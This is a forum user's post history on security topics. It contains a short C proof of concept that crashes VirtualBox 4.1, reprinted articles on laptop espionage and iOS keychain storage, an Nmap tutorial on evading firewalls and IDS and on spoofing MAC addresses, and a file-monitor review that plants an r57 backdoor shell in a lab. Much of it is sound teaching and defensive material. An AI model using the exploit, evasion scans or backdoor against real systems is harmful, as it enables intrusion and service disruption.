Everything posted by DarkyAngel
-
Oracle VM VirtualBox 4.1 Local Denial of Service Vulnerability

Source: http://www.securityfocus.com/bid/55471/info

Oracle VM VirtualBox is prone to a local denial-of-service vulnerability. Attackers can exploit this issue to cause denial-of-service conditions.

```c
/** This software is provided by the copyright owner "as is" and any
 * expressed or implied warranties, including, but not limited to,
 * the implied warranties of merchantability and fitness for a particular
 * purpose are disclaimed. In no event shall the copyright owner be
 * liable for any direct, indirect, incidential, special, exemplary or
 * consequential damages, including, but not limited to, procurement
 * of substitute goods or services, loss of use, data or profits or
 * business interruption, however caused and on any theory of liability,
 * whether in contract, strict liability, or tort, including negligence
 * or otherwise, arising in any way out of the use of this software,
 * even if advised of the possibility of such damage.
 *
 * Copyright (c) 2012 halfdog <me halfdog.net>
 *
 * Compile: gcc -o RtcInt RtcInt.c
 * Usage: ./RtcInt
 */
int main(int argc, char **argv) {
  /* Raise software interrupt vector 8 from user mode; inside an affected
   * VirtualBox 4.1 guest this is what triggers the crash described above. */
  asm (
    "int $0x8;"
    :                                  /* output: none */
    :                                  /* input: none */
    : "%eax", "%ebx", "%ecx", "%edx"   /* clobbered registers */
  );
  return 0;
}
```

Source
-
That's right, but be very careful that they don't catch you!
-
iOS 6, iSight camera in panorama mode, no Google Maps, a system integrated into iOS 6 "guided" mostly by Siri, a more "evolved" Siri anyway; there aren't that many new things..
-
Don't you think you're taking a few too many liberties?
-
http://i.imgur.com/aPPfv.png in case you want it with the RST logo; it's enlarged with "quality" to the required size from there
-
Whether they're jamming crushed Altoids mints into screw holes or prepping themselves to swallow Micro SD cards, some travelers are now going to extreme lengths to defend against foreign snoops.

H.D. Moore wasn't taking chances. During the spring of 2009, the information specialist traveled to Shanghai on a work trip. For a computer, though, he carried only a stripped down Netbook that he modified using a trick even James Bond would have admired. He sawed off the end of one of the laptop case screws and mashed a small bit of a crushed Altoids mint into the hole before putting the screw back in. After leaving it in his hotel room for a few hours, he came back to find that the powder had disappeared. Something had caused the battery to fail, and one of the three passwords protecting his machine had been wiped.

"More than likely it was tampered with," Moore, chief security officer at security firm Rapid7, said. While he concedes a "slim chance" that the battery just happened to die when he left the room, he notes that it's odd for dead batteries to start working again upon reboot, as his did. Not to mention the fact that the powder in the screw hole would have had to displace itself at the same time.

Welcome to the world of international corporate espionage, where USB sticks are favored tools for spies and bribable hotel workers are a dime a dozen. The problem is rampant, particularly in China, where the secrets in laptops of U.S. officials and businessmen can reshape an industry or change the course of a war.

"Foreign Spies Stealing U.S. Economic Secrets in Cyberspace," a report issued last October by the U.S. Office of the National Counterintelligence Executive, warns of the dangers. "Whether traveling for business or personal reasons, U.S. travelers overseas -- businesspeople, U.S. government employees, and contractors -- are routinely targeted by foreign collectors, especially if they are assessed as having access to some sensitive information. Some U.S. allies engage in this practice, as do less friendly powers such as Russia and China. Targeting takes many forms: exploitation of electronic media and devices, surreptitious entry into hotel rooms, aggressive surveillance, and attempts to set up sexual or romantic entanglements."

Similarly, the report "China 2012 Crime and Safety Report: Beijing" warns: "All hotel rooms and offices are considered to be subject to onsite or remote technical monitoring at all times. Hotel rooms, residences, and offices may be accessed at any time without the occupants' consent or knowledge... All means of communication -- telephones, mobile phones, faxes, e-mails, text messages, etc. -- are likely monitored."

Sources within the U.S. government claim that during Commerce Secretary Carlos M. Gutierrez' trip to Beijing in December 2007, an unattended laptop was snagged and relieved of data that was then used to try to hack into government computers in the U.S.

For Moore, the concern was that spies would get access to his corporate e-mail or pull schematics off his laptop related to the high-end network testing gear made by BreakingPoint Systems, where he worked at the time as security research director. He was in China specifically to show the equipment to government officials. "I took a temporary laptop out for the trip," he said. "I wanted to make sure I had something I could destroy and set fire to later if I had to."

This is the underside of the laptop HD Moore used to set his spy trap on his trip to China. The trick screw hole is seen in the top left corner. (Credit: HD Moore)

Specifically, Moore was worried that someone would copy his data to an external drive or install a program that could be used to remotely spy on the computer. To keep snoops out, he set up a password on the BIOS (Basic Input/Output System), as well as for the hard drive, and used a TrueCrypt boot password too.

"Even with that level of paranoia, I had to step out of the hotel in Shanghai (French Quarter business hotel, not Western style), left my Netbook in the room, and two hours later when I returned the BIOS password had been wiped and the powder was gone from the screw hole," he wrote in an e-mail. "I didn't turn it on again until I landed in South Korea and had some time to inspect the motherboard. As far as I can tell, the BIOS was reset through the CMOS (Complementary metal-oxide-semiconductor) jumper/battery short, but no other changes were made."

Kevin Mitnick, who spent five years in prison on computer hacking charges, believes his background made him a target for surveillance during a trip to Colombia in 2008. (He was also detained at the border coming back to the U.S. after that trip, but believes the spying incident is totally unrelated. Weird things just kind of happen to Mitnick.)

The 'aha' moment

Mitnick was in Bogota to give a speech to the newspaper El Tiempo and to visit his then-girlfriend. One night he had left his laptop in the room when he went out to dinner. When he came back his hotel room key wouldn't work. A yellow light appeared when he tried to open the door, which would indicate that it was locked from the inside. He didn't think too much about it, until this happened twice more following visits back down to the front desk to get new keys. The fourth key unlocked the door, finally. But nothing seemed to be amiss with his computer, so Mitnick wasn't initially worried.

Later, the laptop got dented on the flight back to the U.S., so he took it to an Apple store after he got home to get the chassis replaced. There he found that the screws were very loose and one was missing. He knew the screws had been tight because he'd installed a blank drive right before the trip as a security measure. "That was the 'aha' moment," Mitnick said, referring to when he saw the loose screws and flashed back to the mystery hotel key failures. "I always suspected somebody cloned my hard drive... I highly suspect it happened but I have no proof. After that I was in paranoid mode."

Now he never leaves equipment in his room unattended. "I carry it with me wherever I go," said Mitnick, who is an author and security consultant. "I just put it in a book bag." For people who absolutely can't take their computer with them for some reason, Mitnick suggests they put it in a "soft-cloth," untearable FedEx envelope, seal it, mark the closure with pen and put it in the hotel safe so if it is opened it will be noticeable. Spies can still get to it, but they'll find it difficult to tamper with it undetected, he said.

In one of the craziest tricks "spy hunter" James Atkinson has ever seen in his many years in the business, an executive took a micro SD card that contained sensitive data, wrapped it in plastic, and carried it inside his mouth between the gum and cheek. "That's pretty extreme," said Atkinson, who is president of Granite Island Group and has taught counterintelligence to more three-letter U.S. government agencies than I care to name. "If they are in China and someone tries to take them into custody, they will swallow it and hope the government releases them before they have to go to the bathroom."

Spy versus spy

A common ploy to throw spies off is to store unimportant "decoy" encrypted data on a system, like song files or video, mixed in with some more interesting but still not sensitive files. The spies won't immediately know how important the files are until after they've wasted time and energy decrypting it. "Feed them garbage," Atkinson said.

There's also the old video recorder-in-the-clock technique. "That wind-up clock you had on your dresser (facing your laptop), every time it sensed movement it recorded it," he said. "Or the power supply for your laptop had a recording system built into it and you set it on your desk and it videotaped everybody who touches your computer." The video recorder can be deactivated when the user lays a gold ring with a special triggering magnet on the power supply. When the user puts the ring on his finger the video recorder starts recording again.

"I've known people who have taken laptops outside the country, who set them up in their hotel room with a hidden video recorder in the room and put the computer out strictly as bait," and left the hotel room, Atkinson said. When they came back and checked the video they saw "two people coming in with a briefcase, plugging in (a data stealing device) and copying everything on the computer," he said. "That was in Europe."

Atkinson recommends that before and after people travel, they should weigh their computer without the battery, weigh the battery by itself, and weigh the power supply separately too. This way you can find out if someone managed to put a bug in any of the equipment. "They may bug the power supply of a computer, bug a computer, suck everything off a computer, or just take the battery out, remove some cells from the battery and put a listening device in it," he said. "A good bug weighs no more than a fourth of a sugar cube, or a few paper clips."

He also suggests taking multiple power cords and batteries to confound eavesdroppers. "They put bugs in power cords, record the room audio, digitize it and slowly transmit it through the power lines, sneaking through (government) filters of classified areas," Atkinson said.

It's not only government officials and corporate executives who are at risk. Students from prestigious universities studying aeronautics, science, and other areas that may land them future government jobs are targets for blackmail by foreigners eager to recruit spies. "As soon as you go through the airport and you have to show your passport to leave the United States, at that point in time you can trust nothing until you get back home," he said.

This is the screen that was displayed when Moore rebooted the laptop after he had left it unattended in his hotel room. (Credit: HD Moore)

Original Article
-
In the first part of this article, we discussed the iPhone application traffic analysis. In the second part, we covered the privacy issues and property list data storage. In this part, we will take an in-depth look at the keychain data storage. Apple has designed the keychain with many security measures in place to protect the user's data; however, it is broken at every level. So a complete understanding of the keychain and its security and weaknesses will help penetration testers provide proper remediation suggestions during iOS application security assessments.

Local Data Storage

Keychain Storage:

Keychain is an encrypted container (128-bit AES algorithm) and a centralized SQLite database that holds identities and passwords for multiple applications and network services, with restricted access rights. On the iPhone, the keychain SQLite database is used to store small amounts of sensitive data like usernames, passwords, encryption keys, certificates and private keys. In general, iOS applications store the user's credentials in the keychain to provide transparent authentication and to not prompt the user every time for login. iOS applications use the keychain service library/API (secItemAdd, secItemDelete, secItemCopyMatching and secItemUpdate methods) to read and write data to and from the keychain. Developers leverage the keychain services API to have the operating system store sensitive data securely on their behalf, instead of storing it in a property list file or a plaintext configuration file.

On the iPhone, the keychain SQLite database file is located at /private/var/Keychains/keychain-2.db. The keychain contains a number of keychain items, and each keychain item has encrypted data and a set of unencrypted attributes that describe it. The attributes associated with a keychain item depend on the keychain item class (kSecClass). In iOS, keychain items are classified into 5 classes: generic passwords (kSecClassGenericPassword), Internet passwords (kSecClassInternetPassword), certificates (kSecClassCertificate), keys (kSecClassKey) and digital identities (kSecClassIdentity, identity = certificate + key). In the iOS keychain, all the keychain items are stored in 4 tables: genp, inet, cert and keys (shown in Figure 1). The genp table contains generic password keychain items, the inet table contains Internet password keychain items, and the cert and keys tables contain certificates, keys and digital identity keychain items.

(Figure 1)

Columns in the keychain tables are mapped to the corresponding keychain item class attributes. Example: the genp table columns shown in Figure 2 are mapped to generic password keychain item class attributes as shown in Table 1.

(Figure 2)

| Column | Attribute | Description |
|--------|-----------|-------------|
| cdat | kSecAttrCreationDate | Item creation date in Unix epoch time format |
| mdat | kSecAttrModificationDate | Item modification date in Unix epoch time format |
| desc | kSecAttrDescription | User visible string that describes the item |
| icmt | kSecAttrComment | User editable comment for the item |
| crtr | kSecAttrCreator | Application created (4 char) code |
| type | kSecAttrType | Item type |
| scrp | kSecAttrScriptCode | String script code (such as encoding type) |
| labl | kSecAttrLabel | Label to be displayed to the user (print name) |
| alis | kSecAttrAlias | Item alias |
| invi | kSecAttrIsInvisible | Invisible |
| nega | kSecAttrIsNegative | Invalid item |
| cusi | kSecAttrHasCustomIcon | Existence of application specific icon (Boolean) |
| prot | kSecProtectedDataItemAttr ? | Item's data is protected (Boolean) |
| acct | kSecAttrAccount | Account key (such as user id) |
| svce | kSecAttrService | Service name (such as Application identifier) |
| gena | kSecAttrGeneric | User defined attribute |
| data | kSecValueData | Actual data (such as password, crypto key...) |
| agrp | kSecAttrAccessGroup | Keychain access group |
| pdmn | kSecAttrAccessible | Access restrictions (Data protection classes) |

(Table 1)

Attributes for all the keychain item classes are documented in the Keychain Item

Original Article
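The column-to-attribute mapping above is what an assessor uses when reading a keychain-2.db copy pulled during an assessment. The following is an added example, not code from the article, that builds a constructed in-memory stand-in for the genp table, maps its columns to the kSecAttr* names from Table 1, and flags items whose kSecAttrAccessible (pdmn) class makes them readable while the device is locked, which is the remediation finding the article hints at. The short pdmn codes (ak, ck, dk and their -u variants) are an assumption from the iOS 5/6-era keychain layout and should be checked against the target device; the data column stays as an opaque encrypted blob.

```python
import sqlite3

# genp column -> keychain attribute, as listed in Table 1 of the article.
GENP_ATTRIBUTES = {
    "cdat": "kSecAttrCreationDate", "mdat": "kSecAttrModificationDate",
    "desc": "kSecAttrDescription", "icmt": "kSecAttrComment",
    "crtr": "kSecAttrCreator", "type": "kSecAttrType",
    "scrp": "kSecAttrScriptCode", "labl": "kSecAttrLabel",
    "alis": "kSecAttrAlias", "invi": "kSecAttrIsInvisible",
    "nega": "kSecAttrIsNegative", "cusi": "kSecAttrHasCustomIcon",
    "prot": "kSecProtectedDataItemAttr", "acct": "kSecAttrAccount",
    "svce": "kSecAttrService", "gena": "kSecAttrGeneric",
    "data": "kSecValueData", "agrp": "kSecAttrAccessGroup",
    "pdmn": "kSecAttrAccessible",
}

# ASSUMPTION: short codes stored in pdmn for the data protection classes
# (iOS 5/6-era keychain format); verify against the device under test.
PDMN_CLASSES = {
    "ak": "kSecAttrAccessibleWhenUnlocked",
    "ck": "kSecAttrAccessibleAfterFirstUnlock",
    "dk": "kSecAttrAccessibleAlways",
    "aku": "kSecAttrAccessibleWhenUnlockedThisDeviceOnly",
    "cku": "kSecAttrAccessibleAfterFirstUnlockThisDeviceOnly",
    "dku": "kSecAttrAccessibleAlwaysThisDeviceOnly",
}
# Classes whose items the OS will hand back even while the device is locked.
WEAK_CLASSES = {"dk", "dku"}


def build_sample_keychain():
    """Constructed in-memory stand-in for keychain-2.db holding a genp table."""
    conn = sqlite3.connect(":memory:")
    cols = ", ".join(f'"{c}" BLOB' for c in GENP_ATTRIBUTES)  # quote names like desc/type
    conn.execute(f"CREATE TABLE genp ({cols})")
    rows = [  # constructed sample items; data is an opaque encrypted blob
        ("com.example.bank", "alice", "ak", b"<encrypted blob>", "ABCDE12345.com.example.bank"),
        ("com.example.chat", "alice", "dk", b"<encrypted blob>", "ABCDE12345.com.example.chat"),
        ("com.example.vpn", "vpn-user", "dku", b"<encrypted blob>", "ABCDE12345.com.example.vpn"),
    ]
    conn.executemany(
        "INSERT INTO genp (svce, acct, pdmn, data, agrp) VALUES (?, ?, ?, ?, ?)", rows
    )
    return conn


def list_generic_passwords(conn):
    """Return each genp item as a dict keyed by its kSecAttr* attribute names."""
    items = []
    for svce, acct, agrp, pdmn in conn.execute(
        "SELECT svce, acct, agrp, pdmn FROM genp ORDER BY rowid"
    ):
        items.append({
            GENP_ATTRIBUTES["svce"]: svce,
            GENP_ATTRIBUTES["acct"]: acct,
            GENP_ATTRIBUTES["agrp"]: agrp,
            GENP_ATTRIBUTES["pdmn"]: PDMN_CLASSES.get(pdmn, f"unknown({pdmn})"),
            "pdmn": pdmn,
        })
    return items


def find_weakly_protected(conn):
    """Services whose items use an 'Always' class: report these as findings."""
    return [item["kSecAttrService"]
            for item in list_generic_passwords(conn)
            if item["pdmn"] in WEAK_CLASSES]


if __name__ == "__main__":
    db = build_sample_keychain()
    for item in list_generic_passwords(db):
        print(item)
    print("items readable while locked:", find_weakly_protected(db))
```

Against a real database copy, replace `build_sample_keychain()` with `sqlite3.connect("keychain-2.db")`; the same two functions then give the per-service protection class without touching the encrypted data column.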
-
Nmap is the most powerful scanner that is used to perform so many functions, including port scanning, service detection, and even vulnerability detection. "Nmap from beginner to advanced" has covered many basic concepts and commands, and in this second part of this series of articles I will discuss some advanced techniques of Nmap.

How to Evade a Firewall/IDS

Firewalls and IDS (intrusion detection systems) normally play an important role in defending the remote target very well from a security point of view, because this hardware and software is capable of blocking the intrusion, but in the case of penetration testing you need to bypass these tools to get the right result, otherwise you will be misled. Nmap can scan the firewall and other intrusion detection systems on the remote target computer, as it uses different types of techniques to fight against this software, and the techniques are dependent on the remote software. There are two types of firewall that might be installed on the target computer:

- Host based firewall (a firewall is running on a single target computer, for example you are running a firewall on your computer)
- Network based firewall (a firewall has been installed and is running to protect the entire network and has been deployed at the node of the network; it might be a LAN)

There are two types of IDS/IPS also available that might be installed on the target machine; this is the situation that a penetration tester needs to tackle. There are so many different types of Nmap techniques that can be used in this situation, for example:

TCP ACK Scan (-sA)

It is always good to send the ACK packets rather than the SYN packets, because if there is any active firewall working on the remote computer then because of the ACK packets the firewall cannot create the log, since firewalls treat an ACK packet as the response to a SYN packet. The TCP ACK scan requires root privileges at the attacker side and it performs very well against stateless firewalls and IDS. As a penetration tester you need to check the response of a firewall; there might be four types of responses:

- Open port (few ports in the case of the firewall)
- Closed port (most ports are closed because of the firewall)
- Filtered (Nmap is not sure whether the port is open or not)
- Unfiltered (Nmap can access the port but is still confused about the open status of the port)

So these are some important responses that you might get during a penetration test. The ACK scan is slightly different from the other types of scanning techniques because it has not been designed to discover the open ports, but it has the ability to determine the filtered and unfiltered responses. Let's compare the two results of an ACK scan.

Firewall Enabled:

```
# nmap -sA 192.168.1.9
Starting Nmap 5.51 ( http://nmap.org ) at 2012-07-28 13:30 PKT
Nmap scan report for 192.168.1.9
Host is up (0.00077s latency).
All 1000 scanned ports on 192.168.1.9 are filtered
```

Firewall Disabled:

```
# nmap -sA 192.168.1.9
Starting Nmap 5.51 ( http://nmap.org ) at 2012-07-28 13:31 PKT
Nmap scan report for 192.168.1.9
Host is up (0.00020s latency).
All 1000 scanned ports on 192.168.1.9 are unfiltered
```

So now it is very easy to find out whether the target computer has a firewall enabled or not, since a simple ACK scan means there is a lower chance of detection at the victim side but a high chance for the attacker to discover the firewall. The results of a SYN scan for both situations are as follows:

Note: The victim is the Windows computer for all the cases with the three situations.

[Figures: SYN scan output for three situations: firewall enabled; firewall enabled + all ports are closed; firewall disabled]

TCP Window Scan (-sW)

Very similar to the ACK scan with a little difference: the TCP window scan has been designed to differentiate between open and closed ports instead of showing unfiltered. It also requires root privilege to execute. Let's examine the different responses of a TCP window scan.

Firewall Enabled:

```
# nmap -sW 192.168.1.9
Starting Nmap 5.51 ( http://nmap.org ) at 2012-07-28 13:50 PKT
Nmap scan report for 192.168.1.9
Host is up (0.00051s latency).
All 1000 scanned ports on 192.168.1.9 are filtered
```

Firewall Disabled:

```
# nmap -sW 192.168.1.9
Starting Nmap 5.51 ( http://nmap.org ) at 2012-07-28 13:51 PKT
Nmap scan report for 192.168.1.9
Host is up (0.00071s latency).
All 1000 scanned ports on 192.168.1.9 are closed
```

This type of scan does not open any active session with the target computer, so there is no chance that the victim's computer can create a log of the activities. It works on the simple phenomenon of sending ACK packets and receiving a single RST packet in response.

Fragment Packets (-f)

It is a very general concept and can be used in so many different situations; for example, if the target machine does not have the capability to handle larger packets then the fragmentation technique is useful to evade the firewall. The parameter of this technique is -f; it just splits the request into small segments of IP packets called fragmented IP packets. You can use -f twice (-ff) if you want to further break the IP headers.

Firewall Enabled:

```
# nmap -f 192.168.1.9
Starting Nmap 5.51 ( http://nmap.org ) at 2012-07-28 14:21 PKT
Nmap scan report for 192.168.1.9
Host is up (0.00056s latency).
Not shown: 998 filtered ports
PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:27:66:13:9B (Cadmus Computer Systems)
```

Firewall enabled + all ports are closed:

```
# nmap -ff 192.168.1.9
Starting Nmap 5.51 ( http://nmap.org ) at 2012-07-28 14:24 PKT
Nmap scan report for 192.168.1.9
Host is up (0.00083s latency).
All 1000 scanned ports on 192.168.1.9 are filtered
MAC Address: 08:00:27:66:13:9B (Cadmus Computer Systems)
```

Firewall Disabled:

```
# nmap -f 192.168.1.9
Starting Nmap 5.51 ( http://nmap.org ) at 2012-07-28 14:20 PKT
Nmap scan report for 192.168.1.9
Host is up (0.00057s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:27:66:13:9B (Cadmus Computer Systems)
```

Spoof MAC Address

This is one of the simpler techniques: you can spoof your MAC (attacker MAC) address. MAC address spoofing creates a very difficult situation for the victim to identify the computer that originated the incoming request. Nmap can select a completely random MAC address for each and every scan based on the vendor name; the other option is to manually specify the MAC address (by doing this an attacker can spoof the address of a computer on the same network). Nmap has a database called nmap-mac-prefixes, and whenever the vendor name is given it looks in the database to find a suitable MAC address.

```
# nmap --spoof-mac Cisco 192.168.1.3
Starting Nmap 5.51 ( http://nmap.org ) at 2012-07-28 17:18 PKT
Spoofing MAC address 00:00:0C:6D:3F:26 (Cisco Systems)
Nmap scan report for 192.168.1.3
Host is up (0.00036s latency).
Not shown: 996 filtered ports
PORT    STATE  SERVICE
23/tcp  closed telnet
80/tcp  closed http
139/tcp open   netbios-ssn
445/tcp open   microsoft-ds
MAC Address: 08:00:27:66:13:9B (Cadmus Computer Systems)
```

Nmap Timing Option

The timing option is a very important and interesting feature of Nmap, since sometimes you need to make a delay between every request. There are so many reasons for this, but the most important reason is stress on the network; sometimes the victim's computer and even a network cannot handle a big request. As a penetration tester you need to make sure that your scanning is not treated as a Denial of Service attack (DoS), so timely responses and requests are very important aspects of scanning. Nmap has so many features and parameters that can be very helpful to scan a target in a timely manner; the fragmentation technique (-f) as discussed is also a useful technique to split your request into multiple segments. The other important parameters are discussed below:

Delay (--scan_delay)

This is the best parameter that can be used to control the delay between each and every request. Since you can control the time between each probe, you need to make sure to use the timing in integer form, and do not forget to mention the unit of time:

- ms (millisecond) e.g. 5ms
- s (second) e.g. 5s
- m (minute) e.g. 5m
- h (hour) e.g. 5h

Let's consider an example.

Simple Scan:

```
# nmap localhost
. . .
Nmap done: 1 IP address (1 host up) scanned in 0.21 seconds
```

Delay Scan:

```
# nmap --scan_delay 5ms localhost
. . .
Nmap done: 1 IP address (1 host up) scanned in 5.31 seconds
```

Host Timeout Option (--host-timeout)

Sometimes a host takes too much time to respond, and if you are scanning an entire network then it is very difficult to wait for a single host. There might be so many reasons behind a slow response, for example the network connectivity and the firewall, so if you don't want to waste your time then you can set a time limit.

Nmap Scripting

Nmap scripting is one of the best features that Nmap has. Nmap scripts are very useful for the penetration tester because they can save so much time and effort. The Nmap scripting engine has more than 400 scripts at the time of this writing, and you can create your own script; everyone can create a script and submit it to the script engine to help the community of penetration testers. Nmap scripts can perform so many different functions, from vulnerability scanning to exploitation and from malware detection to brute forcing. In this section I will discuss some of the best Nmap scripts and their usage:

smb-check-vulns

This is one of the important scripts that can scan to check the vulnerabilities:

- MS08-067 Windows vulnerability that can be exploited
- Conficker malware on the target machine
- Denial of service vulnerability of Windows 2000
- MS06-025 Windows vulnerability
- MS07-029 Windows vulnerability

Now it is very easy to find the above vulnerabilities on the target machine, and you can easily exploit it via Metasploit.

http-enum

If you want to enumerate on the web server to find the directories of the website then this is the best Nmap script for this purpose. The http-enum script is also used to discover the open ports and to list software with their version on each port.

```
root@bt:~# nmap -sV --script=http-enum 127.0.0.1
Starting Nmap 5.51 ( http://nmap.org ) at 2012-07-28 18:47 PKT
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000036s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.14 ((Ubuntu))
| http-enum:
|   /login.php: Possible admin folder
|   /login/: Login page
|   /login.php: Login page
|   /logs/: Logs
```

samba-vuln-cve-2012-1182

The script to perform the desired scanning against the target machine to find the Samba heap overflow vulnerability CVE-2012-1182.

```
nmap --script=samba-vuln-cve-2012-1182 -p 139 target
nmap --script=samba-vuln-cve-2012-1182 -p 139 192.168.1.3
```

smtp-strangeport

So many organizations are running their SMTP server on a non-standard port for security reasons. smtp-strangeport is the script to find out whether the SMTP is running on the standard port or not.

```
nmap -sV --script=smtp-strangeport target
```

http-php-version

As the name suggests, this script has been created to get the PHP version from the web server. The software version is very important for a penetration tester to find the respective vulnerability, so this script is very helpful for web application penetration testing.

```
nmap -sV --script=http-php-version target
```

The Nmap scripting engine contains so many scripts that you can even find several scripts for a specific software or platform. For example, if you want to do penetration testing on a website which is based on WordPress then you can use Nmap scripts for this purpose:

- http-wordpress-plugins
- http-wordpress-enum
- http-wordpress-brute

dns-blacklist

This is the best script in my view to find blacklisted IP addresses. All you need to do is just provide an IP, then the script checks it against the DNS anti-spam and proxy blacklists.

```
# nmap -sn 67.213.218.72 --script dns-blacklist
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-07-28 23:54 PKT
Nmap scan report for 67.213.218.72
Host is up (0.24s latency).
Host script results:
| dns-blacklist:
|   PROXY
|     dnsbl.tornevall.org - PROXY
|       IP marked as "abusive host"
|       Proxy is working
|_      Proxy has been scanned
```

Conclusion

This article is an effort to cover the most important aspects of Nmap from beginner to advanced so that everyone can learn even without previous knowledge. This is not the end, because Nmap has a lot of features; you can do many things by using Nmap. I recommend you to practice with it every day, because practice makes a man perfect.

Source
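The ACK-scan and window-scan tables above show the same probe producing "filtered", "unfiltered" or "closed" depending only on what sits in front of the host. The following added example (not Nmap's code and not part of the article) models that verdict logic so a defender can see why each firewall configuration yields each result: a stateless "allow established" rule passes any segment carrying the ACK flag, a stateful filter drops an ACK that matches no tracked connection, and the host answers an unsolicited ACK with an RST on every port; Nmap's -sW then reads the RST's window field, which the article's Windows target sets to zero for every port (hence "all closed"). The Host, Probe and firewall_forwards names are this example's own; the positive-window behaviour for open ports is an assumption about the minority of TCP stacks -sW is designed for.

```python
from dataclasses import dataclass


@dataclass
class Probe:
    flags: str   # "A" is the bare-ACK probe used by both -sA and -sW
    dport: int


@dataclass
class Reply:
    flags: str   # "R" for an RST segment
    window: int = 0


class Host:
    """Target with a set of listening ports. An unsolicited ACK draws an RST
    from every port, open or closed; rst_window_for_open models the stacks
    that put a positive window in RSTs for open ports (ASSUMPTION: the
    article's Windows target behaves like the default of 0 for all ports)."""

    def __init__(self, open_ports, rst_window_for_open=0):
        self.open_ports = set(open_ports)
        self.rst_window_for_open = rst_window_for_open

    def respond(self, probe):
        win = self.rst_window_for_open if probe.dport in self.open_ports else 0
        return Reply("R", win)


def firewall_forwards(mode, probe):
    """Whether a firewall in the given mode lets the probe reach the host."""
    if mode == "none":
        return True
    if mode == "stateless":
        # Stateless ACL: 'permit established' keys on the ACK flag alone.
        return "A" in probe.flags
    if mode == "stateful":
        # Connection tracking: an ACK with no tracked session is dropped.
        return False
    raise ValueError(f"unknown firewall mode {mode!r}")


def send_probe(host, mode, port):
    probe = Probe("A", port)
    if not firewall_forwards(mode, probe):
        return None            # silence: Nmap sees no reply at all
    return host.respond(probe)


def ack_scan(host, mode, port):
    """-sA verdict: RST back means unfiltered, no reply means filtered."""
    return "unfiltered" if send_probe(host, mode, port) is not None else "filtered"


def window_scan(host, mode, port):
    """-sW verdict: like -sA, but a positive window in the RST means open."""
    reply = send_probe(host, mode, port)
    if reply is None:
        return "filtered"
    return "open" if reply.window > 0 else "closed"


def summarize(scan, host, mode, ports):
    """Count verdicts per state, like Nmap's 'All 1000 scanned ports are ...' line."""
    counts = {}
    for p in ports:
        state = scan(host, mode, p)
        counts[state] = counts.get(state, 0) + 1
    return counts


if __name__ == "__main__":
    windows_box = Host({139, 445})          # constructed stand-in for 192.168.1.9
    top1000 = range(1, 1001)
    for mode in ("stateful", "stateless", "none"):
        print(mode, "ACK:", summarize(ack_scan, windows_box, mode, top1000),
              "Window:", summarize(window_scan, windows_box, mode, top1000))
```

The defensive takeaway is visible in the output: only the stateful mode turns every probe into "filtered", while a stateless "allow established" rule answers an ACK scan exactly as if no firewall were present.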
-
A few weeks ago, I happened to read an article from pir8geek.com (a blog about Linux goodies and tips) about a new tool which is very useful to system administrators and users for monitoring their files, folders, configurations, backups, scripts and directories in Windows, Linux, FreeBSD, Mac OS, and Solaris. This new tool or application is called Log4Trail and it is a lightweight file monitoring tool which can also be considered a simple or basic intrusion detection system (IDS) that is coded from scratch in Java by impeldown of The ProjectX Blog. Log4Trail has a user-friendly graphical user interface (GUI) which is helpful for newbies, junior system administrators and users who want to monitor their files and directories easier in order to check if there are files that are being modified by someone who could possibly be a malicious user, a cracker or maybe your pesky little brother or sister who wants to play a prank on you. Once you open the application, it will prompt a pop up balloon or message from the system tray which will notify the current user who is logged into the system. And just like any intrusion detection systems out there, it records information about the files that have been changed and then notifies the security and system administrators of the important observed events with the use of the balloon pop up message and through email if the mailer configuration setup is configured. To record the observed events, the application uses the SQLite database to store information of the system files. Yes you read me right, it produces reports like a boss! Getting Started with Log4Trail File Monitoring Log4Trail is a free software application that can be downloaded here. 
The file format is a tarball file, so to extract the contents of that file and move to its directory, type these commands in your terminal: tar -zxvf Log4Trail.tar.gz cd Log4Trail To run the application, issue this one-line command in your terminal: java -jar Log4Trail.jar The application has a setup or extra feature that sends you an email about the file changes [from checksum] and [to new checksum] using the SHA1 file checking algorithm and in order to activate this feature, click Options and then click on Enable Mailer. The next thing you should do is configure the mailer configuration and the mailer account with the corresponding recipients(TO,CC,BCC) to your choice. This can be used if you are away from your computer or server because you will be notified through email about the files or directories that were changed. So be sure you bring your laptop or your handy dandy smart phone with you always in order to be updated. Now set the path of the directory or the file that you want to be monitored by clicking on the File Manager which can be found under the File menu button of the main form, or you can access it through its shortcut key which is Ctrl + Shift + A. Click the New button, then navigate through the file or directory that you want to manage and monitor. Take for example this scenario: a system administrator wants to monitor or check if there will be new users that will be added to his Linux server so he can just set Log4Trail’s File Manager configuration to /etc/passwd. This can be helpful in order to detect malicious users who are currently adding users in the system if your system has been compromised. In my case, I decided to set and configure it to /var/www because I have a LAMP (Linux, Apache, Perl, Perl / Python /PHP) server running locally in my school which is intended for penetration testing purposes, program testing and for hunting malicious users. 
After adding a directory to be monitored, a dialog box should appear, as in the image below. Note that this dialog appears only for a directory, because you are asked to choose the recursion type: click Yes to continue with the setup and another prompt appears that says "Please select recursion type". If you want files in subdirectories added recursively, choose "Force recursion in subdirectories"; if you want only the directory's own files, choose "Only recurse contents". In this writeup I chose "Only recurse contents". If you chose a single file to be monitored, it is added automatically and no further setup is needed. If you have other files or directories to add, click the New button again and repeat the process. After setting up the File Manager, restart the application so that the changes take effect. Once it has restarted, it starts monitoring the files on your server and you should be good to go.

Here is what I did to check whether Log4Trail File Monitoring is really effective and can be used as a simple intrusion detection system (but not as an intrusion prevention system): I planted a backdoor shell on my Linux box, which has a local LAMP server running, then moved to another computer on my network and accessed the box's internal IP (Internet Protocol) address through the common r57 PHP backdoor shell. Then I edited the file bot.txt under the /var/www directory. Here is a screenshot of what appeared in the system tray of the computer where Log4Trail was running and monitoring /var/www: it says "/var/www/bot.txt has been changed", meaning Log4Trail detected that I had edited bot.txt.
Because I had enabled the mailer and set up the mailer configuration, I also received an email about the change to my files; here is a screenshot of the email. The record of the file that was modified also appears in the main application, which shows whether the email was sent to the administrator or the user. The details include: identifier, time stamp, station, file, from CS, to CS, and mailed. So if an intruder manages to change the index of your website, the system tray alerts you. The image below gives another scenario.

Additional Information and Tips

